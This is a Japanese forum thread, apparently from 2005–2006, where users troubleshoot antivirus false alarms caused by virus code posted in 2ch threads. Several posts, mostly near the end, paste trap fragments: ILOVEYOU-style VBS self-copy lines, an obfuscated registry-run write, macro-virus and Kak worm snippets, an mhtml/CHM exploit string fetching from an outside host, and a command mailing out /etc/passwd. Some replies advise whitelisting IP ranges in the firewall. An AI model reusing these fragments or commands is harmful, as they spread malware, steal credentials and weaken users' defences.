詳しくはこのスレの
>>1-10 あたりをよく読んでください。
ちなみにこのスレを読み込んだときもノートンが反応すると思います。
>>307 ありがとうございました!安心しました。
質問です。
>>310 専ブラはIEとは違い、自分自身のログフォルダに2chのレスを保存します。
A Boneのログフォルダで「感染ファイル」が発見されたのなら全く正常で、何の心配もありません。
2chのレスにウィルスのソースコードが書き込まれていても、それを実行する方法はないので、
感染することはありません。
2ちゃんブラウザをダウンロードしてボードの一覧を取りにいったら、
http://plaza.rakuten.co.jp/takamoriyo/ このサイトのランキングを押そう!!
そしてランキング一位にさせよう!!!!
>>314 ファイアウォールの通信制御設定を探して、2ch専用ブラウザの通信を許可してください。
わからなければ、セキュリティ対策ソフト(ファイアウォールやアンチウィルス)の製品名とバージョン、
2ch専用ブラウザの名前を書いてください。
>>316 設定のところを見てみましたが、どう設定していいのか分かりませんでした…
ソフトはノートン2005です
2ちゃんブラウザはjane styleです
>>317 このページを見てください。
http://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/jp_docid/20041007161706947 「3. プログラム制御の設定を確認する」の左の[+]をクリックして表示される説明をよく読んでください。
[手動プログラム制御] の一覧からjaneと思しきものを探し「すべてを許可」に設定してください。
>>318 ありがとうございました!!
無事に一覧取得できました!
本当にありがとうございます!!
教えて下さい
@スタート(タスクバーの左端にあるボタン)
>>323 ありがとうございます
それでやってみます
Norton Anti Virusのオプション
>>328 そこはスパイウェアやアドウェアの検出に関する設定なので、2chのログには関係ない。
NIS2005を使用しています
Opera8.5で
>>2 にあるテスト用の
http://www.eicar.org/download/eicar.com.txtを踏んでみたのですがNAVが反応しません 。
これはAutoProtectが正常に働いていないということなのでしょうか。
試しにローカルにDLしてみてスキャンをかけてみると、ウィルスだと反応して削除します。
>>331 ですが、解決できました。
「オプション」→「NortonAntiVirus」→「AutoProtect」にて、
「SmartScanを使ってファイルをスキャン」にチェックが入っていたのを「完全ファイルスキャン」に変更したら反応しました。
拡張子.txtがAutoProtectの対象になってなかったってことなんですね……。失礼しました。
勝手に修復したり隔離したりする設定になってると、困ることもある。特に2ch専用ブラウザ使ってる場合。
これか
何もノートンが誤反応しているわけではありません。
cenの部屋の管理人さんへ、
誤反応スクリプト無効化ソフト vicptdel ですが、
VBS Freelink.Bにも対応してもらえないでしょうか?
またサイトトップには、updateの表示だけでなく、update日付やVerも
記載していただけたら嬉しいです。ご検討よろしくお願いします。
cenの部屋
http://www.geocities.jp/cen_hp/ ラウンジ開いたらブラッドハウンドに感染したみたいなんですが解決法がいまいちよく解りません…
Vipのスレ一覧でも反応するっぽいけど誤検出なんだろねえ…
Bloodhound.Exploit.6ってなんてコードで引っ掛かってるですか?
専用ブラウザでNGワード指定しても2chの鯖から取得して保存されるデータは同じなので無意味。
>>337 ご意見ありがとうです。
VBS.Freelink.Bですが、パターンは1つですが対応はしていますよ。
対応していないパターンかもしれないので、もしよかったら誤反応した
スレを教えて頂けないでしょうか。
そうですね。日付とバージョンはまた書いときますです。
>>345 見てみました。そこの
>>5 からdatファイルを作って試しましたが、
無効化して、ウイルス対策ソフトでスキャンしても反応しませんでした
よ。
あと、このソフトで対応しているのは、2chにあるdatファイルのみです。
例:
http://pc7.2ch.net/pcqa/dat/xxxxxxxxxx.dat 壺のdatやhtmlには対応していないです。
http://game10.2ch.net/test/read.cgi/handygame/1133109700/ このスレを読み込もうとすると、ノートン先生が
206.223.150.115からのアタックを検出して
途中までしか読み込めなくなります。
手動スキャンとAuto-Protectでlogフォルダの
除外の設定はしたんだけどまだダメっぽい。
OSはWinXP, ノートン先生はNAV2003, 専ブラはLive2chです。
たっけてー。
>>351 NAVですか? インターネットセキュリティじゃなくて?
スレみたら、Nortonスレで昨日話題になったonloadなんちゃらのトラップを確認しました。
これはフォルダの除外設定では対応できなかったと思います。
NIS使ってるなら、NISを無効にして再取得を。
>>352 あーバカが貼りやがったよorz
>>353 あ、NISでした。勘違いsorry。
無効→再取得してトラップっぽいレス(
>>499 と
>>543 )
2個あぼ〜んにしました。
これだけで問題ないですか?
>>354 あぼーんの意味はありません。一度取得すれば問題ありません。
ただし、新規に貼られたら、NGワードに指定してあぼーん(または透明あぼーん)しても引っかかります。
現状での対処法としては
○引っかかったときにNISを切って再取得をする対処療法
○侵入検知の設定で、AutoBlockの除外項目に2chの鯖を登録する(穴をあけることになるので微妙ですが)
くらいでしょうか。
Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
Live2chでそれをやるのはちょっと手間なようです。
Live2chのスレでも少し話題になってますので、そちらも追っておくことをお勧めします。
>>355 ご丁寧にどうもありがとうございます。
一度取得してしまえばそれでオワリなんですね。
Live2chのスレ探して見てみます。
>>355 >Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
誘導もしくは詳しくお願いします。
>>357 <ここ数日2chを騒がせている侵入検知トラップの対策法>
症状:
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。
対策:上に行くほどおすすめ
@Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ
AReplace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない
Bよくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。
ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
今回のはNAVではなくNIS管轄のトラップです
Nortonスレはこちら。
ただし、問題の起こる文字列が貼られているので、読み込むときには上記対策のいずれかを行ってください。
【ノートン】インターネットセキュリティ Ver.77【2006】
http://pc8.2ch.net/test/read.cgi/sec/1132279196/ >>358 それガセらしいじゃないか・・・
。゚(゚´Д`゚)゜。ウァァァン
>>361 あーはいはい。
1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
とりあえずKnowledge Base 経由で
>>352 のソースをツマンテックに送って対応を催促しますた。
ノートンの誤作動対策したら、
>>367 >>362 の設定ですか?
2ちゃんねるブラウザでの不具合は
お使いの2ちゃんねるブラウザのスレで環境を詳しく書いてお聞きください。
<body onload=windowあ()> ms-its:mhtml:fileあ://c:\
doredore,
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
vicptdelで処理した後、久々にNAVでJaneのlogをスキャンしてみたら、
以下のレスがvicptdelで処理されていなかったらしく、NAVに削除されました。
http://tmp5.2ch.net/test/read.cgi/download/1133670032/11 http://makimo.to/2ch/tmp5_download/1133/1133670032.html#11 cenさんもしよろしければ、対応お願いします。
またスレタイがウィルスコードだったのか分かりませんが、subject.txtに
以下のUnix Penguinが入っていましたが、datだけでなく、
vicptdelでsubject.txt等も対応できないでしょうか?
caXt /etc/paXsswd | mail noXbody (Xを削除)
>>376 そのスレの11ですが、そのパターンは対応していますよ。
手で11のdatを作って、スキャンしたら無効化されました。
デフォルトだとスキャンする時から10日前以降に更新されたdat
ファイルのみスキャンする設定なので、すべてのdatファイルを
スキャンする設定でしてみてください。
あと、subject.txtは専用ブラウザで板を見るときに常に更新するもの
だと思いますので、無効化しても効果がないので、スキャンはしない
です。
ノートンインターネット2006を入れたのですが、初心者の質問の板が
NIS2006を入れたんですが、誤反応しません。
>>381 普通にLiveUpdateとかできるのに…いや、それより何故割れてるって解るんでしょうか?
>>382 (((((((( ;゚Д゚)))))))ガクガクブルブル
.l l \| | !ノートン先生 ! //U ヽ___/
>>385 このスレを一通り読んでから質問しろよ情報乞食
>>385 何でそうやってすぐに聞こうとするの?
まともな日本語能力と社会的常識を持っていれば
ちょっと調べれば、ちょっと読めば解決するのに
http://210.150.222.13/cgi-bin/imgbbs01/imgboard.cgi の掲示板に貼られている空白?の画像はスパイウェアー
だと他の利用者が知らせてくれたのですが、
もしかしたらクリックしてしまったたかもしれません
スパイウェアーというのは感染するとどうなってしまうのでしょうか?
怖いので今日中に再フォーマットするつもりですが・・・
自称PC初心者はスレタイも読めない日本語初心者…っと。
>>389 あ、今、別のスレで教えてもらえました
すいませんm(__)m
>>388 踏んだ 踏んだ どうにもならへん
内部で呼び出しているサーバーがお休みのようだ
マカフィーさんも無反応
XP_SP2にとってはブラクラ以外の何物にもならない
バージョン 】 1.12
>>394 ここに来たってことはノートン入れてるんでしょ?
原因はノートン
ついでに保守age
すみません。色々やったけどギブですorz質問よろしいでしょうか…
■janeDoeα 0.1.12.2■xp■NIS2004■
>>1-9 は読みました
>>51 >>56 さんとややケースが似てるんですが…
最近ノートン2004を再インスコしたので、前と同じ方法(
>>1 )で
また専ブラのlogフォルダを除外設定しました、が、何故か今度はどう設定やり直しても
下記のスレで先生に怒られます。
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/ (このスレです…)
http://pc8.2ch.net/test/read.cgi/hp/1135924815/ 警告メッセージのスクショ↓
(このスレのです。これが2回でます)
(下のスレのです)
で、何度設定しても駄目だったのでこのソフトを入れて、トラップの無効化を試みたんですけど
http://www.geocities.jp/cen_hp/program3.html#use_____ やっぱり上記のスレで先生に怒られます。何回かこのソフト起動させてみたんですが
無効化成功してるよ。みたいなメッセージが出るだけで、依然として先生は怒りまくりだし
もうどうしていいか分かりません。誰か助けて〜(つД`;)
>>398 >>398 今一度、Norton Anti Virusのオプションで
手動スキャンとAuto-Protectでlogフォルダの除外の指定をしているか確認してください。
該当スレに書き込んだ・該当スレをお気に入りに入れた・ウイルスコードを検索したりすると
幾つか除外の指定を増やすことになるのでご注意ください。
Janeの場合
Jane2ch\Logs
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
Jane2ch\SearchHistory.txt
ε三(; ・∀・)鯖マデオツカイの場合
otsukai\result.dat
詳しくはお使いの2ちゃんねるブラウザのスレのテンプレや
2ちゃんねるブラウザのヘルプ
2ちゃんねるブラウザ配布サイト等のFAQなどを参照してください。
>>401 補足
増えた項目の内、
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
otsukai\result.dat
↑はスレタイに反応した場合です。
Live2chのフォルダごとNorton Anti Virus→除外に設定しても良いの?
すみません、質問です。
先程、他のスレッド見ていたら、ノートンの低危険度の表示が出てきて遮断をクリックしたら、あらゆるホームページが見れなくなりました。原因解るかた教えてください。宜しくお願いします。m(__)m
>>407 誘導されたらそう書け
それと普通
>>1 から読むもんだ
既知の質問を延々と繰り返し答えさせられるこっちの身にもなれ
これかな? http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ >>408 はぁ?おめーから何も答えてもらってねーぞ。
解らねーんだったらいちいち出てくんじゃねぇよアフォ
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
>>410 お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ
>>410 この部分ね
2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる
コードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの
設定を見直さなければなりませんがあくまで暫定的処置です。
NIS2005の場合(多分NIS2006も同じ)
>>411 解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。
あっ。ちなみにぼくは、愛新ではありません。
時々ノートンインターネットセキュリティ2004を使用している際、
>>418 >>371 の問題でもないってことでしょうか。
371の暫定対処をした場合はどうなりますか?
>>419 ありがとうごぜーます。
呼んできます。
■>>1-9 を読みましたか? 『YES』 >>421-422 > マカフィーを使っている
> datファイルの入ったzipファイル
2ちゃんねるブラウザのログファイルでは無い場合はこちらのスレでは扱っていません。
このスレでは「ノートントラップ」は2ちゃんねる(掲示板)にウイルスコードが貼り付けられ
Webブラウザや2ちゃんねるブラウザのログでノートンが誤反応することを指しています。
http://pc7.2ch.net/test/read.cgi/pcqa/1138826147/441 そのzipファイルがアップローダーで拾ったものならマカフィーは正常な反応を示しているかと思います。
念のためにオンラインスキャンしてみてください。
http://www.trendmicro.co.jp/hcall/index.asp マカフィーについて以降はより詳しいあなたの環境(zipファイルの出所・何のアプリケーションに使われているのか等)を書いて
以下のスレにここから誘導されたことも併記してお尋ねください。
がんばれマカフィー Part.23 / ガンバレMcAfee
http://pc8.2ch.net/test/read.cgi/sec/1136576534/ もしマカフィーが2ちゃんねるブラウザのログで反応しているのならお手数ですがもう一度こちらに来てください。
>>423 ご丁寧に解答を頂きありがとうございます。
datファイルの入ったzipファイルはある2ちゃんねるのスレのまとめサイト
からダウンロードしたファイルです。
オンラインスキャンでは何も見つからなかったです。
>もしマカフィーが2ちゃんねるブラウザのログで反応しているのなら
>お手数ですがもう一度こちらに来てください
datファイルは2ちゃんねるのスレッドのdatファイルなのですが
こちらでよろしいでしょうか?お願いします。
>>424-425 おそらくそれはウイルスコードにマカフィーが誤反応しているものだと思われます。
他で教えていただいたのですがマカフィーにはノートンのようなウイルススキャンでフォルダ・ファイルの除外項目が無いそうです。
以下、現在の状況での対処方法です。
2ちゃんねるブラウザのJane派生のJaneViewでWickedStr.txtに手動で反応する文字列の一部を追記する。
誤反応スクリプト無効化ソフト
http://www.geocities.jp/cen_hp/program3.htmlのアップデ ートを待って(現在マカフィートラップには対応していません)
ActiveShieldを無効→対象スレを取得→「誤反応スクリプト無効化ソフト」を使ってウイルスコードを無効→ActiveShield有効
2ちゃんねるブラウザMonoViewのアップデートを待って(現在マカフィートラップには対応していません)読み込む。
一番いい方法はマカフィーに該当するdatファイルを送って対策を促すことだと思います。
マカフィーユーザーで既に対処の仕方を知っている方がいらっしゃるのかもしれませんので
>>423 のマカフィーのスレでこちらのことを聞いてみていただけませんでしょうか。
対処方法がありましたらこちらのスレにもお知らせいただけると幸いです。
また参考のためにも今後もこちらに来ていただけると助かります。
ノートントラップとマカフィートラップのウイルスコードは違うようなので
ノートンでは反応しないでマカフィーが誤反応したりまたその逆もあります。
長々としましたがマカフィートラップについての決定打が見当たらないので手探りのレスを御許しください。
参考にマカフィートラップと思われるやり取りの過去ログです。
http://pc5.2ch.net/test/read.cgi/sec/1106492538/72-77+553-555+558-559+563 http://makimo.to:8000/2ch/pc5_sec/1106/1106492538.html http://qb5.2ch.net/test/read.cgi/saku/1097313582/62-65n http://jbbs.livedoor.jp/bbs/read.cgi/computer/10301/1071925088/373-378 >>426 わかりやすく説明していただき、
関連スレまで貼っていただいてありがとうございます。
ただ解決まではいけなかったので
>>423 の方で聞かせて頂きます。
何かわかりましたらこちらにも報告させて頂きますね。
ありがとうございました。
なんかjaneでこのスレ読むとレス番がずれまくりなんですけど
XPに最初から入ってるノートンをアンインスコしたらもう再インスコって出来ませんかね??
>>430 丁寧なレスありがとうございました。火壁の設定してログ捨ててみたら
ズレてるの直りました!感謝です!
以前こちらで質問させて頂いて誘導された者です。
解決方法がわかりましたのでその報告をさせて頂きます。
結論からいうとマカフィーが起動している時にzipファイルの中からdatファイルを
出す方法はありませんでした。
ただマカフィーの自動スキャンを一時的に止めてその間にzipファイルの中の
datファイルを取り出すことができました。
一時的に自動スキャンを止める方法は(以下コピペ)
http://www.mcafee.com/japan/pqa/aMcAfeeMvs.asp?ancQno=MV05040434&ancProd=McAfeeMvs >また、管理者権限でコンピュータにログオンし、[Ctrl]キーと[Shift]キーを押しながら
>タスクトレイのアイコンを右クリックすると、更に隠しメニューが表示されます。
>この隠しメニューから通常のメニューに加えて以下の操作を行うことができます。
>・隔離アイテムの一覧
>・VShieldを無効にする/VShieldを有効にする
>・終了
とのことでした。実際に試したところ成功いたしました。
またvbsウイルスソースが多々隔離されており消したところかなり早くなりました。
丁寧に教えてくれた皆さん、ありがとうございました。
>>430 >この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
ということですが、それはセキュリティ的には問題ないレベルなんですか?
あと↓によると
2chNIS問題まとめページ
http://mickey.mirv.net/2chnis.html >以下の対処方法では除外するIPアドレスの範囲からの攻撃に対してNISは反応しなくなります。
とありますが、2ちゃん以外の場所で除外したIPアドレスを利用した
悪意ある攻撃があった場合は大丈夫なんでしょうか?
それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
分かる方いらっしゃったらご教授お願いします
>>432 お知らせありがとうございます。
マカフィーについての解説を参照できますので助かりました。
>>433 > 2ちゃん以外の場所で除外したIPアドレスを利用した
> 悪意ある攻撃があった場合は大丈夫なんでしょうか?
2ちゃんねる以外のIPアドレスを除外することはここではお勧めしません。
また、2ちゃんねるからの攻撃・進入等はいままではありませんでした。
過去には踏み台pcを規制するための2ちゃんねるからのインバウンド TCP 接続信号を受け入れなければいけなかったこともあります。
http://pc.2ch.net/sec/kako/1037/10377/1037772137.html の7
只、何事も絶対安全ということはないのでセキュ板本スレを見るようにしてください。
なにかあったら祭りになりますので。
【ノートン】インターネットセキュリティ Ver.82【2006】
http://pc8.2ch.net/test/read.cgi/sec/1138802896/ > それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
おそらくないはずですが、2ちゃんねるのIPアドレスそのものに関しては
以下のスレに誘導されたことを明記してお聞きください。
質問・雑談スレ215@運用情報板
http://qb5.2ch.net/test/read.cgi/operate/1139244364/ 関連スレ
ノートン誤作動対策本部
http://qb5.2ch.net/test/read.cgi/operate/1133161720/ >>434 お答え頂いてありがとうございました
紹介して頂いたスレはお気に入りに登録しました
あと運用情報板に質問して、疑問も解消しました
ありがとうございました
ここできいていいのかあれだけど、
FWが反応してるだけみたいだね。
2chブラウザのログ保存フォルダを「除外」に設定して、2ちゃんのスレで
そんなノートンは窓から捨てろwwwwwwwwwww
>>438 2chブラウザのログ保存フォルダにウィルスが入り込むことはありません。
ノートンがログ保存フォルダからウィルスを見つけたと言い出しても、スレタイにある通り誤認です。
リンクをクリックして起動したWebブラウザがウィルスのあるページを読み込もうとしたときは
ちゃんと守ってくれます。
>>438 JANE DOE STYLEでvbs踏んで、20分後くらいから何かプログラムを実行しようとする度に
>>443 VBSを踏んだってのはソースが貼り付けてあるスレを開いたってこと?
それともVBSが実行されたってこと?
>>444 スレを開いただけです。
遮断ばかりしてたらいつの間にか上記のような状態になってしまってまして、
通信許可にしないと、どのプログラムも動きません。
>>445 リストから全部削除しろ バカ
WindowsUpdateしていたら何にも感染などしねえわ
>>446 > WindowsUpdateしていたら何にも感染などしねえわ
それはどうかな?
>>371 で板の見れない問題は解決したのですが、これは危険なのですか?
また暫定的処置という事ですが、なんらかの対応はあったのでしょうか?
>>448 202.222.31.214 206.223.147.35 (ryって数字が並んでるでしょ。これは2chの鯖の
IPをそのまま列挙して「この鯖は誤作動を引き起こす可能性があるだけで実害はないから、
警告しなくていいよ」という指示だから、処置を適切にしてさえいれば、あんまり
深刻に考えないで良いです。
>>446 Microsft Update 入れてください(><)
avastがvbsウィルスのソースに誤反応
元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
キタ━━ <body onload=window()> ━━━ !!
元祖ぶる殿 ◆U/gDqFZzsY の自作自演 http://pc.2ch.net/test/read.cgi/pcqa/1021802095/837-846 >>837 >>837 >>839 元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
総合質問のスレッドで質問したところ、ここに誘導されたので、
ちなみにjane doe styleで2ちゃんねるを閲覧しています。
>461
ラブレターなどのウイルスではなくノートンプロテクションセンターが、侵入の試みを
遮断みたいなのが出るんですけど、このスレを全部読んでもどれが自分の症状の
解決策なのか分かりません・・・・。
ログのオートプロテクトの除外と手動スキャンの除外は前からしてあるのですが・・・・。
>>4 を見ても何がなんだか・・・・。
>>466 おまえが初めに質問したスレでの自分へのレスをちゃんとよめや
>>467 見てきましたが、当方インターネットセキュリティではなくアンチウイルスなので
書いてあることができません・・・・。
これは他スレで使ってるコテなので気にしないでください。
>>469 何だ釣りなのか。
思いっきり釣られちゃったよ(´∀`)
なかなかの釣り師ですね。
具体的にどのレスの何を実行すればいいかということだけでも教えてくれませんか?
>>471 このコテはリアルで魚釣りなんで・・・・。
マジレスお願いします・・・。
すみません。これ以上いると荒れるようなので、これで失礼します・・・。
>>473 何の魚を飼ってたの?環境省にごめんなさいしなきゃいけなかったなんて。。
>>473 本当に「インターネットセキュリティではなくアンチウイルス」なら、これが
参考になるかも(自分は2年ほど前にノートンやめたので確認できないが)
http://qb5.2ch.net/test/read.cgi/operate/1142464918/781 >>480 の誤反応スクリプトやろうと思ったけど、オートプロテクトを無効にしても攻撃を遮断するんだよね。
だからできなかった。まあIEで読めるからいいんだけどね。
ぼるぷー ◆sTCCYJJ/Lo の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
◆OCHZHO05EY の 自作自演
http://pc.2ch.net/test/read.cgi/win/1021112227/511-514 511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511 [Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512 自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
>>480 こういうサイトって新鯖に変わるごとに新しい鯖のアドレス追加してるのですか?
それとも、それは手動で追加しないと駄目なのですか?
>>487 手動ですね ある意味DNS鯖と逆を行く作業な訳ですから
>>1 を読んだんですが、
ログ保存フォルダを手動スキャンから除外するのは何故なんでしょうか?
http://ex14.2ch.net/test/read.cgi/keiba/1143011764 http://mob.cx-keiba.jp http://sports.nifty.com/superkeiba/ >>490 誤反応させないようにするためじゃないの?
>>490 本当に
>>1 を読んだなら理解できるはず。
簡単にまとめると、ノートンはウィルスとして動作しないものまでウィルスと判定する。
(部分的なパターン照合だけで判定するため)
ノートンのこの性質を悪用して、ノートンを反応させる文字列を2chに貼りまくるヴァカが大勢いる。
ノートン側も2ch側も対応する気はなく、ノートンユーザーが各自対策するしかない。
「手動スキャン」に限って言えば、自動で駆除/隔離しないようにして、いちいち
手動で対応してもよいなら敢えて除外しないという選択もあり。
Avastですが191の方法でも駄目です。
最近PCが重い! http://www.hoverdesk.net/freeware.htm http://downloads.at.infoseek.co.jp/ >>494 ここにavastユーザーはあまりこないので
誘導されたこととテンプレをよく読んで
より詳しい環境を添えて↓で聞いてください。
avast! Anti-Virus Part41
http://pc8.2ch.net/test/read.cgi/sec/1143369350/ 最初そちらに書き込もうと思ったのですが
>>501 新スレに移行しましたね。
avast! Anti-Virus Part43
http://pc8.2ch.net/test/read.cgi/sec/1143473121/ >>500 にもありますがテンプレをよく読んで誘導されたこととより詳しい環境を添えて聞いてください。
嵐があっても見てくださる人はいます。
チャットではないので即レスは期待しないでくださいね。
邪魔が入ってスルーされたと感じて再投稿する場合や再質問する場合は最初に質問したレス番を名前欄に入れてください。
参考に
一般的な質問の仕方
http://ansitu.xrea.jp/guidance/?methodofquestion 502さんありがとう。
Wscript.KakWormっていうウィルスを↓のスレを見るたびに感染します。
http://sakura01.bbspink.com/test/read.cgi/ascii/1135064245/l50 (´・ω・`)ボスケテ
ノートンさんが反応します。
>>511 初心者なもので分かりませんorz683とは何ですか?
http://money4.2ch.net/test/read.cgi/pachij/1140536153/ ここのすれの>>457のところにウイルスコードがあってあるので、
ノートンを立ち上げて、オプション→オートプロテクト→除外→新規→フォルダー?アイコン→
ローカルディスク(C)→プログラムファイル→Live2ちゃん→log→money4.2ch.net→pachij→
1140536153と1140536153.idx→すべてOKで閉じ
をしたのに、相変わらず上のスレではノートンが反応します。
再度除外項目を見たのですがきちんと除外項目に入ってました。
何故反応するのでしょうか??
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
>>519 ,522
・・・
>>1 2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
ログフォルダの場所等についてはお使いの2ちゃんねるブラウザの配布サイト・ヘルプ・スレ等で確認してください。
また、これとは別にワーム誤反応対策の設定もしてね。
http://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures 2chNIS問題まとめページ
http://mickey.mirv.net/2chnis.html 一昨日くらいからスレが見れなくなった
>>524 ログ除外以外にもやる事がある
>>1 から読め
c.Copy(dirwin&"\Win32DLL.vbs") http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。
>NIS2005の場合(多分NIS2006も同じ)
>>524 と同じ症状です。
ここ1週間から出てる。
, -'"´  ̄`丶、_
, -'"´  ̄`丶、_
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail
